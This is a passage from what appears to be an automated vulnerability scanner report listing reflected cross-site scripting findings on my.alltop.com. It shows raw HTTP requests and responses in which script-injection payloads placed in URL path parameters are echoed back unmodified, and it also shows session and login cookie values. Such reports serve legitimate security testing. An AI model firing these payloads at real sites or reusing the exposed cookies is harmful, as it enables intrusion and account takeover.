Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:14 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:14 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E?7343d"><script>alert(1)</script>9e1094090ef=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.252. http://my.alltop.com/alpha/y/%22ns=%22netsparker(0x000202) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y/%22ns=%22netsparker(0x000202)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7b87"><script>alert(1)</script>43171f0d292 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/yf7b87"><script>alert(1)</script>43171f0d292/%22ns=%22netsparker(0x000202) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:20 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:20 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:20 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/yf7b87"><script>alert(1)</script>43171f0d292/%22ns=%22netsparker(0x000202)" method="post" accept-charset="utf-8">
...[SNIP]...

1.253. http://my.alltop.com/alpha/y/%22ns=%22netsparker(0x000202) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y/%22ns=%22netsparker(0x000202)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 786cf"><script>alert(1)</script>0c02c316324 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y/%22ns786cf"><script>alert(1)</script>0c02c316324=%22netsparker(0x000202) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no